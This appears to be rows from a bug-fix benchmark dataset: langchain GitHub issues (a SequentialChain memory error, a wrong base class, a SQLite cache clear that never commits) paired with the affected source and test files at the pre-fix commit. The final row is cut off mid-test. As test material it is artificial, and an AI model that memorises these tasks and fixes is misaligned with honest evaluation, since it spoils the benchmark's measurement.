status
stringclasses 1
value | repo_name
stringclasses 31
values | repo_url
stringclasses 31
values | issue_id
int64 1
104k
| title
stringlengths 4
369
| body
stringlengths 0
254k
⌀ | issue_url
stringlengths 37
56
| pull_url
stringlengths 37
54
| before_fix_sha
stringlengths 40
40
| after_fix_sha
stringlengths 40
40
| report_datetime
unknown | language
stringclasses 5
values | commit_datetime
unknown | updated_file
stringlengths 4
188
| file_content
stringlengths 0
5.12M
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 6,768 | Can't use memory for an internal LLMChain inside a SequentialChain | ### System Info
Langchain 0.0.214
Python 3.11.1
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Create a `SequentialChain` that contains 2 `LLMChain`s, and add a memory to the first one.
2. When running, you'll get a validation error:
```
Missing required input keys: {'chat_history'}, only had {'human_input'} (type=value_error)
```
### Expected behavior
You should be able to add memory to one chain, not just the Sequential Chain | https://github.com/langchain-ai/langchain/issues/6768 | https://github.com/langchain-ai/langchain/pull/6769 | 488d2d5da95a2bacdca3d1623d862ac5ab28d59e | f307ca094b0d175d71ac424eba3d9f7ef5fc44f1 | "2023-06-26T16:09:11Z" | python | "2023-07-13T06:47:44Z" | tests/unit_tests/chains/test_sequential.py | """Test pipeline functionality."""
from typing import Dict, List, Optional
import pytest
from langchain.callbacks.manager import CallbackManagerForChainRun
from langchain.chains.base import Chain
from langchain.chains.sequential import SequentialChain, SimpleSequentialChain
from langchain.memory.simple import SimpleMemory
class FakeChain(Chain):
"""Fake Chain for testing purposes."""
input_variables: List[str]
output_variables: List[str]
@property
def input_keys(self) -> List[str]:
"""Input keys this chain returns."""
return self.input_variables
@property
def output_keys(self) -> List[str]:
"""Input keys this chain returns."""
return self.output_variables
def _call(
self,
inputs: Dict[str, str],
run_manager: Optional[CallbackManagerForChainRun] = None,
) -> Dict[str, str]:
outputs = {}
for var in self.output_variables:
variables = [inputs[k] for k in self.input_variables]
outputs[var] = f"{' '.join(variables)}foo"
return outputs
def test_sequential_usage_single_inputs() -> None:
"""Test sequential on single input chains."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"])
output = chain({"foo": "123"})
expected_output = {"baz": "123foofoo", "foo": "123"}
assert output == expected_output
def test_sequential_usage_multiple_inputs() -> None:
"""Test sequential on multiple input chains."""
chain_1 = FakeChain(input_variables=["foo", "test"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"])
chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"])
output = chain({"foo": "123", "test": "456"})
expected_output = {
"baz": "123 456foo 123foo",
"foo": "123",
"test": "456",
}
assert output == expected_output
def test_sequential_usage_memory() -> None:
"""Test sequential usage with memory."""
memory = SimpleMemory(memories={"zab": "rab"})
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
chain = SequentialChain(
memory=memory, chains=[chain_1, chain_2], input_variables=["foo"]
)
output = chain({"foo": "123"})
expected_output = {"baz": "123foofoo", "foo": "123", "zab": "rab"}
assert output == expected_output
memory = SimpleMemory(memories={"zab": "rab", "foo": "rab"})
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
with pytest.raises(ValueError):
SequentialChain(
memory=memory, chains=[chain_1, chain_2], input_variables=["foo"]
)
def test_sequential_usage_multiple_outputs() -> None:
"""Test sequential usage on multiple output chains."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"])
chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"])
chain = SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"])
output = chain({"foo": "123"})
expected_output = {
"baz": "123foo 123foo",
"foo": "123",
}
assert output == expected_output
def test_sequential_missing_inputs() -> None:
"""Test error is raised when input variables are missing."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar", "test"], output_variables=["baz"])
with pytest.raises(ValueError):
# Also needs "test" as an input
SequentialChain(chains=[chain_1, chain_2], input_variables=["foo"])
def test_sequential_bad_outputs() -> None:
"""Test error is raised when bad outputs are specified."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
with pytest.raises(ValueError):
# "test" is not present as an output variable.
SequentialChain(
chains=[chain_1, chain_2],
input_variables=["foo"],
output_variables=["test"],
)
def test_sequential_valid_outputs() -> None:
"""Test chain runs when valid outputs are specified."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
chain = SequentialChain(
chains=[chain_1, chain_2],
input_variables=["foo"],
output_variables=["bar", "baz"],
)
output = chain({"foo": "123"}, return_only_outputs=True)
expected_output = {"baz": "123foofoo", "bar": "123foo"}
assert output == expected_output
def test_sequential_overlapping_inputs() -> None:
"""Test error is raised when input variables are overlapping."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "test"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
with pytest.raises(ValueError):
# "test" is specified as an input, but also is an output of one step
SequentialChain(chains=[chain_1, chain_2], input_variables=["foo", "test"])
def test_simple_sequential_functionality() -> None:
"""Test simple sequential functionality."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
chain = SimpleSequentialChain(chains=[chain_1, chain_2])
output = chain({"input": "123"})
expected_output = {"output": "123foofoo", "input": "123"}
assert output == expected_output
def test_multi_input_errors() -> None:
"""Test simple sequential errors if multiple input variables are expected."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar"])
chain_2 = FakeChain(input_variables=["bar", "foo"], output_variables=["baz"])
with pytest.raises(ValueError):
SimpleSequentialChain(chains=[chain_1, chain_2])
def test_multi_output_errors() -> None:
"""Test simple sequential errors if multiple output variables are expected."""
chain_1 = FakeChain(input_variables=["foo"], output_variables=["bar", "grok"])
chain_2 = FakeChain(input_variables=["bar"], output_variables=["baz"])
with pytest.raises(ValueError):
SimpleSequentialChain(chains=[chain_1, chain_2])
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 6,231 | correct the base class | https://github.com/hwchase17/langchain/blob/c7db9febb0edeba1ea108adc4423b789404ce5f2/langchain/experimental/plan_and_execute/schema.py#L31
From
`class ListStepContainer(BaseModel):`
To
`class ListStepContainer(BaseStepContainer):`
| https://github.com/langchain-ai/langchain/issues/6231 | https://github.com/langchain-ai/langchain/pull/6232 | 98e1bbfbbdffca55775e847899d2823f6232ebe7 | af3f4010155a882b8b1021b6e0de130c628dab2c | "2023-06-15T15:16:56Z" | python | "2023-07-13T07:03:02Z" | langchain/experimental/plan_and_execute/schema.py | from abc import abstractmethod
from typing import List, Tuple
from pydantic import BaseModel, Field
from langchain.schema import BaseOutputParser
class Step(BaseModel):
value: str
class Plan(BaseModel):
steps: List[Step]
class StepResponse(BaseModel):
response: str
class BaseStepContainer(BaseModel):
@abstractmethod
def add_step(self, step: Step, step_response: StepResponse) -> None:
"""Add step and step response to the container."""
@abstractmethod
def get_final_response(self) -> str:
"""Return the final response based on steps taken."""
class ListStepContainer(BaseModel):
steps: List[Tuple[Step, StepResponse]] = Field(default_factory=list)
def add_step(self, step: Step, step_response: StepResponse) -> None:
self.steps.append((step, step_response))
def get_steps(self) -> List[Tuple[Step, StepResponse]]:
return self.steps
def get_final_response(self) -> str:
return self.steps[-1][1].response
class PlanOutputParser(BaseOutputParser):
@abstractmethod
def parse(self, text: str) -> Plan:
"""Parse into a plan."""
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,652 | SQLite LLM cache clear does not take effect | ### System Info
Langchain version: 0.0.231
Python version: 3.10.11
Bug:
There is an issue when clearing LLM cache for SQL Alchemy based caches.
langchain.llm_cache.clear() does not clear the cache for SQLite LLM cache.
Reason: it doesn't commit the deletion database change. The deletion doesn't take effect.
### Who can help?
@hwchase17 @ag
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
- Configure SQLite LLM Cache
- Call an LLM via langchain
- The SQLite database get's populated with an entry
- call langchain.llm_cache.clear()
- Actual Behaviour: Notice that the entry is still in SQLite
### Expected behavior
- Expected Behaviour: The cache database table should be empty | https://github.com/langchain-ai/langchain/issues/7652 | https://github.com/langchain-ai/langchain/pull/7653 | c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd | 24c165420827305e813f4b6d501f93d18f6d46a4 | "2023-07-13T12:36:48Z" | python | "2023-07-13T13:39:04Z" | langchain/cache.py | """Beta Feature: base interface for cache."""
from __future__ import annotations
import hashlib
import inspect
import json
import logging
from abc import ABC, abstractmethod
from datetime import timedelta
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
from sqlalchemy import Column, Integer, String, create_engine, select
from sqlalchemy.engine.base import Engine
from sqlalchemy.orm import Session
from langchain.utils import get_from_env
try:
from sqlalchemy.orm import declarative_base
except ImportError:
from sqlalchemy.ext.declarative import declarative_base
from langchain.embeddings.base import Embeddings
from langchain.load.dump import dumps
from langchain.load.load import loads
from langchain.schema import Generation
from langchain.vectorstores.redis import Redis as RedisVectorstore
logger = logging.getLogger(__file__)
if TYPE_CHECKING:
import momento
RETURN_VAL_TYPE = Sequence[Generation]
def _hash(_input: str) -> str:
"""Use a deterministic hashing approach."""
return hashlib.md5(_input.encode()).hexdigest()
def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str:
"""Dump generations to json.
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: Json representing a list of generations.
"""
return json.dumps([generation.dict() for generation in generations])
def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE:
"""Load generations from json.
Args:
generations_json (str): A string of json representing a list of generations.
Raises:
ValueError: Could not decode json string to list of generations.
Returns:
RETURN_VAL_TYPE: A list of generations.
"""
try:
results = json.loads(generations_json)
return [Generation(**generation_dict) for generation_dict in results]
except json.JSONDecodeError:
raise ValueError(
f"Could not decode json to list of generations: {generations_json}"
)
class BaseCache(ABC):
"""Base interface for cache."""
@abstractmethod
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
@abstractmethod
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
@abstractmethod
def clear(self, **kwargs: Any) -> None:
"""Clear cache that can take additional keyword arguments."""
class InMemoryCache(BaseCache):
"""Cache that stores things in memory."""
def __init__(self) -> None:
"""Initialize with empty cache."""
self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {}
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
return self._cache.get((prompt, llm_string), None)
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
self._cache[(prompt, llm_string)] = return_val
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
self._cache = {}
Base = declarative_base()
class FullLLMCache(Base): # type: ignore
"""SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_llm_cache"
prompt = Column(String, primary_key=True)
llm = Column(String, primary_key=True)
idx = Column(Integer, primary_key=True)
response = Column(String)
class SQLAlchemyCache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache):
"""Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt == prompt) # type: ignore
.where(self.cache_schema.llm == llm_string)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
rows = session.execute(stmt).fetchall()
if rows:
try:
return [loads(row[0]) for row in rows]
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
# In a previous life we stored the raw text directly
# in the table, so assume it's in that format.
return [Generation(text=row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update based on prompt and llm_string."""
items = [
self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.query(self.cache_schema).delete()
class SQLiteCache(SQLAlchemyCache):
"""Cache that uses SQLite as a backend."""
def __init__(self, database_path: str = ".langchain.db"):
"""Initialize by creating the engine and all tables."""
engine = create_engine(f"sqlite:///{database_path}")
super().__init__(engine)
class RedisCache(BaseCache):
"""Cache that uses Redis as a backend."""
# TODO - implement a TTL policy in Redis
def __init__(self, redis_: Any):
"""Initialize by passing in Redis instance."""
try:
from redis import Redis
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Redis object.")
self.redis = redis_
def _key(self, prompt: str, llm_string: str) -> str:
"""Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
# Read from a Redis HASH
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
# Write to a Redis HASH
key = self._key(prompt, llm_string)
self.redis.hset(
key,
mapping={
str(idx): generation.text for idx, generation in enumerate(return_val)
},
)
def clear(self, **kwargs: Any) -> None:
"""Clear cache. If `asynchronous` is True, flush asynchronously."""
asynchronous = kwargs.get("asynchronous", False)
self.redis.flushdb(asynchronous=asynchronous, **kwargs)
class RedisSemanticCache(BaseCache):
"""Cache that uses Redis as a vector-store backend."""
# TODO - implement a TTL policy in Redis
def __init__(
self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2
):
"""Initialize by passing in the `init` GPTCache func
Args:
redis_url (str): URL to connect to Redis.
embedding (Embedding): Embedding provider for semantic encoding and search.
score_threshold (float, 0.2):
Example:
.. code-block:: python
import langchain
from langchain.cache import RedisSemanticCache
from langchain.embeddings import OpenAIEmbeddings
langchain.llm_cache = RedisSemanticCache(
redis_url="redis://localhost:6379",
embedding=OpenAIEmbeddings()
)
"""
self._cache_dict: Dict[str, RedisVectorstore] = {}
self.redis_url = redis_url
self.embedding = embedding
self.score_threshold = score_threshold
def _index_name(self, llm_string: str) -> str:
hashed_index = _hash(llm_string)
return f"cache:{hashed_index}"
def _get_llm_cache(self, llm_string: str) -> RedisVectorstore:
index_name = self._index_name(llm_string)
# return vectorstore client for the specific llm string
if index_name in self._cache_dict:
return self._cache_dict[index_name]
# create new vectorstore client for the specific llm string
try:
self._cache_dict[index_name] = RedisVectorstore.from_existing_index(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
)
except ValueError:
redis = RedisVectorstore(
embedding_function=self.embedding.embed_query,
index_name=index_name,
redis_url=self.redis_url,
)
_embedding = self.embedding.embed_query(text="test")
redis._create_index(dim=len(_embedding))
self._cache_dict[index_name] = redis
return self._cache_dict[index_name]
def clear(self, **kwargs: Any) -> None:
"""Clear semantic cache for a given llm_string."""
index_name = self._index_name(kwargs["llm_string"])
if index_name in self._cache_dict:
self._cache_dict[index_name].drop_index(
index_name=index_name, delete_documents=True, redis_url=self.redis_url
)
del self._cache_dict[index_name]
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
llm_cache = self._get_llm_cache(llm_string)
generations = []
# Read from a Hash
results = llm_cache.similarity_search_limit_score(
query=prompt,
k=1,
score_threshold=self.score_threshold,
)
if results:
for document in results:
for text in document.metadata["return_val"]:
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisSemanticCache only supports caching of "
f"normal LLM generations, got {type(gen)}"
)
llm_cache = self._get_llm_cache(llm_string)
# Write to vectorstore
metadata = {
"llm_string": llm_string,
"prompt": prompt,
"return_val": [generation.text for generation in return_val],
}
llm_cache.add_texts(texts=[prompt], metadatas=[metadata])
class GPTCache(BaseCache):
"""Cache that uses GPTCache as a backend."""
def __init__(
self,
init_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = None,
):
"""Initialize by passing in init function (default: `None`).
Args:
init_func (Optional[Callable[[Any], None]]): init `GPTCache` function
(default: `None`)
Example:
.. code-block:: python
# Initialize GPTCache with a custom init function
import gptcache
from gptcache.processor.pre import get_prompt
from gptcache.manager.factory import get_data_manager
# Avoid multiple caches using the same file,
causing different llm model caches to affect each other
def init_gptcache(cache_obj: gptcache.Cache, llm str):
cache_obj.init(
pre_embedding_func=get_prompt,
data_manager=manager_factory(
manager="map",
data_dir=f"map_cache_{llm}"
),
)
langchain.llm_cache = GPTCache(init_gptcache)
"""
try:
import gptcache # noqa: F401
except ImportError:
raise ImportError(
"Could not import gptcache python package. "
"Please install it with `pip install gptcache`."
)
self.init_gptcache_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = init_func
self.gptcache_dict: Dict[str, Any] = {}
def _new_gptcache(self, llm_string: str) -> Any:
"""New gptcache object"""
from gptcache import Cache
from gptcache.manager.factory import get_data_manager
from gptcache.processor.pre import get_prompt
_gptcache = Cache()
if self.init_gptcache_func is not None:
sig = inspect.signature(self.init_gptcache_func)
if len(sig.parameters) == 2:
self.init_gptcache_func(_gptcache, llm_string) # type: ignore[call-arg]
else:
self.init_gptcache_func(_gptcache) # type: ignore[call-arg]
else:
_gptcache.init(
pre_embedding_func=get_prompt,
data_manager=get_data_manager(data_path=llm_string),
)
self.gptcache_dict[llm_string] = _gptcache
return _gptcache
def _get_gptcache(self, llm_string: str) -> Any:
"""Get a cache object.
When the corresponding llm model cache does not exist, it will be created."""
return self.gptcache_dict.get(llm_string, self._new_gptcache(llm_string))
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up the cache data.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then retrieve the data from the cache based on the `prompt`.
"""
from gptcache.adapter.api import get
_gptcache = self.gptcache_dict.get(llm_string, None)
if _gptcache is None:
return None
res = get(prompt, cache_obj=_gptcache)
if res:
return [
Generation(**generation_dict) for generation_dict in json.loads(res)
]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then store the `prompt` and `return_val` in the cache object.
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"GPTCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
from gptcache.adapter.api import put
_gptcache = self._get_gptcache(llm_string)
handled_data = json.dumps([generation.dict() for generation in return_val])
put(prompt, handled_data, cache_obj=_gptcache)
return None
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
from gptcache import Cache
for gptcache_instance in self.gptcache_dict.values():
gptcache_instance = cast(Cache, gptcache_instance)
gptcache_instance.flush()
self.gptcache_dict.clear()
def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None:
"""Create cache if it doesn't exist.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
from momento.responses import CreateCache
create_cache_response = cache_client.create_cache(cache_name)
if isinstance(create_cache_response, CreateCache.Success) or isinstance(
create_cache_response, CreateCache.CacheAlreadyExists
):
return None
elif isinstance(create_cache_response, CreateCache.Error):
raise create_cache_response.inner_exception
else:
raise Exception(f"Unexpected response cache creation: {create_cache_response}")
def _validate_ttl(ttl: Optional[timedelta]) -> None:
if ttl is not None and ttl <= timedelta(seconds=0):
raise ValueError(f"ttl must be positive but was {ttl}.")
class MomentoCache(BaseCache):
"""Cache that uses Momento as a backend. See https://gomomento.com/"""
def __init__(
self,
cache_client: momento.CacheClient,
cache_name: str,
*,
ttl: Optional[timedelta] = None,
ensure_cache_exists: bool = True,
):
"""Instantiate a prompt cache using Momento as a backend.
Note: to instantiate the cache client passed to MomentoCache,
you must have a Momento account. See https://gomomento.com/.
Args:
cache_client (CacheClient): The Momento cache client.
cache_name (str): The name of the cache to use to store the data.
ttl (Optional[timedelta], optional): The time to live for the cache items.
Defaults to None, ie use the client default TTL.
ensure_cache_exists (bool, optional): Create the cache if it doesn't
exist. Defaults to True.
Raises:
ImportError: Momento python package is not installed.
TypeError: cache_client is not of type momento.CacheClientObject
ValueError: ttl is non-null and non-negative
"""
try:
from momento import CacheClient
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if not isinstance(cache_client, CacheClient):
raise TypeError("cache_client must be a momento.CacheClient object.")
_validate_ttl(ttl)
if ensure_cache_exists:
_ensure_cache_exists(cache_client, cache_name)
self.cache_client = cache_client
self.cache_name = cache_name
self.ttl = ttl
@classmethod
def from_client_params(
cls,
cache_name: str,
ttl: timedelta,
*,
configuration: Optional[momento.config.Configuration] = None,
auth_token: Optional[str] = None,
**kwargs: Any,
) -> MomentoCache:
"""Construct cache from CacheClient parameters."""
try:
from momento import CacheClient, Configurations, CredentialProvider
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if configuration is None:
configuration = Configurations.Laptop.v1()
auth_token = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN")
credentials = CredentialProvider.from_string(auth_token)
cache_client = CacheClient(configuration, credentials, default_ttl=ttl)
return cls(cache_client, cache_name, ttl=ttl, **kwargs)
def __key(self, prompt: str, llm_string: str) -> str:
"""Compute cache key from prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Returns:
str: The cache key.
"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Lookup llm generations in cache by prompt and associated model and settings.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model version and settings.
Raises:
SdkException: Momento service or network error
Returns:
Optional[RETURN_VAL_TYPE]: A list of language model generations.
"""
from momento.responses import CacheGet
generations: RETURN_VAL_TYPE = []
get_response = self.cache_client.get(
self.cache_name, self.__key(prompt, llm_string)
)
if isinstance(get_response, CacheGet.Hit):
value = get_response.value_string
generations = _load_generations_from_json(value)
elif isinstance(get_response, CacheGet.Miss):
pass
elif isinstance(get_response, CacheGet.Error):
raise get_response.inner_exception
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Store llm generations in cache.
Args:
prompt (str): The prompt run through the language model.
llm_string (str): The language model string.
return_val (RETURN_VAL_TYPE): A list of language model generations.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"Momento only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self.__key(prompt, llm_string)
value = _dump_generations_to_json(return_val)
set_response = self.cache_client.set(self.cache_name, key, value, self.ttl)
from momento.responses import CacheSet
if isinstance(set_response, CacheSet.Success):
pass
elif isinstance(set_response, CacheSet.Error):
raise set_response.inner_exception
else:
raise Exception(f"Unexpected response: {set_response}")
def clear(self, **kwargs: Any) -> None:
"""Clear the cache.
Raises:
SdkException: Momento service or network error
"""
from momento.responses import CacheFlush
flush_response = self.cache_client.flush_cache(self.cache_name)
if isinstance(flush_response, CacheFlush.Success):
pass
elif isinstance(flush_response, CacheFlush.Error):
raise flush_response.inner_exception
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,652 | SQLite LLM cache clear does not take effect | ### System Info
Langchain version: 0.0.231
Python version: 3.10.11
Bug:
There is an issue when clearing LLM cache for SQL Alchemy based caches.
langchain.llm_cache.clear() does not clear the cache for SQLite LLM cache.
Reason: it doesn't commit the deletion database change. The deletion doesn't take effect.
### Who can help?
@hwchase17 @ag
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
- Configure SQLite LLM Cache
- Call an LLM via langchain
- The SQLite database get's populated with an entry
- call langchain.llm_cache.clear()
- Actual Behaviour: Notice that the entry is still in SQLite
### Expected behavior
- Expected Behaviour: The cache database table should be empty | https://github.com/langchain-ai/langchain/issues/7652 | https://github.com/langchain-ai/langchain/pull/7653 | c17a80f11c200e2f7a65b54eb2f2942b8a6ea3bd | 24c165420827305e813f4b6d501f93d18f6d46a4 | "2023-07-13T12:36:48Z" | python | "2023-07-13T13:39:04Z" | tests/unit_tests/test_cache.py | """Test caching for LLMs and ChatModels."""
from typing import Dict, Generator, List, Union
import pytest
from _pytest.fixtures import FixtureRequest
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
import langchain
from langchain.cache import (
InMemoryCache,
SQLAlchemyCache,
)
from langchain.chat_models import FakeListChatModel
from langchain.chat_models.base import BaseChatModel, dumps
from langchain.llms import FakeListLLM
from langchain.llms.base import BaseLLM
from langchain.schema import (
ChatGeneration,
Generation,
)
from langchain.schema.messages import AIMessage, BaseMessage, HumanMessage
def get_sqlite_cache() -> SQLAlchemyCache:
return SQLAlchemyCache(engine=create_engine("sqlite://"))
CACHE_OPTIONS = [
InMemoryCache,
get_sqlite_cache,
]
@pytest.fixture(autouse=True, params=CACHE_OPTIONS)
def set_cache_and_teardown(request: FixtureRequest) -> Generator[None, None, None]:
# Will be run before each test
cache_instance = request.param
langchain.llm_cache = cache_instance()
if langchain.llm_cache:
langchain.llm_cache.clear()
else:
raise ValueError("Cache not set. This should never happen.")
yield
# Will be run after each test
if langchain.llm_cache:
langchain.llm_cache.clear()
langchain.llm_cache = None
else:
raise ValueError("Cache not set. This should never happen.")
def test_llm_caching() -> None:
prompt = "How are you?"
response = "Test response"
cached_response = "Cached test response"
llm = FakeListLLM(responses=[response])
if langchain.llm_cache:
langchain.llm_cache.update(
prompt=prompt,
llm_string=create_llm_string(llm),
return_val=[Generation(text=cached_response)],
)
assert llm(prompt) == cached_response
else:
raise ValueError(
"The cache not set. This should never happen, as the pytest fixture "
"`set_cache_and_teardown` always sets the cache."
)
def test_old_sqlite_llm_caching() -> None:
if isinstance(langchain.llm_cache, SQLAlchemyCache):
prompt = "How are you?"
response = "Test response"
cached_response = "Cached test response"
llm = FakeListLLM(responses=[response])
items = [
langchain.llm_cache.cache_schema(
prompt=prompt,
llm=create_llm_string(llm),
response=cached_response,
idx=0,
)
]
with Session(langchain.llm_cache.engine) as session, session.begin():
for item in items:
session.merge(item)
assert llm(prompt) == cached_response
def test_chat_model_caching() -> None:
prompt: List[BaseMessage] = [HumanMessage(content="How are you?")]
response = "Test response"
cached_response = "Cached test response"
cached_message = AIMessage(content=cached_response)
llm = FakeListChatModel(responses=[response])
if langchain.llm_cache:
langchain.llm_cache.update(
prompt=dumps(prompt),
llm_string=llm._get_llm_string(),
return_val=[ChatGeneration(message=cached_message)],
)
result = llm(prompt)
assert isinstance(result, AIMessage)
assert result.content == cached_response
else:
raise ValueError(
"The cache not set. This should never happen, as the pytest fixture "
"`set_cache_and_teardown` always sets the cache."
)
def test_chat_model_caching_params() -> None:
prompt: List[BaseMessage] = [HumanMessage(content="How are you?")]
response = "Test response"
cached_response = "Cached test response"
cached_message = AIMessage(content=cached_response)
llm = FakeListChatModel(responses=[response])
if langchain.llm_cache:
langchain.llm_cache.update(
prompt=dumps(prompt),
llm_string=llm._get_llm_string(functions=[]),
return_val=[ChatGeneration(message=cached_message)],
)
result = llm(prompt, functions=[])
assert isinstance(result, AIMessage)
assert result.content == cached_response
result_no_params = llm(prompt)
assert isinstance(result_no_params, AIMessage)
assert result_no_params.content == response
else:
raise ValueError(
"The cache not set. This should never happen, as the pytest fixture "
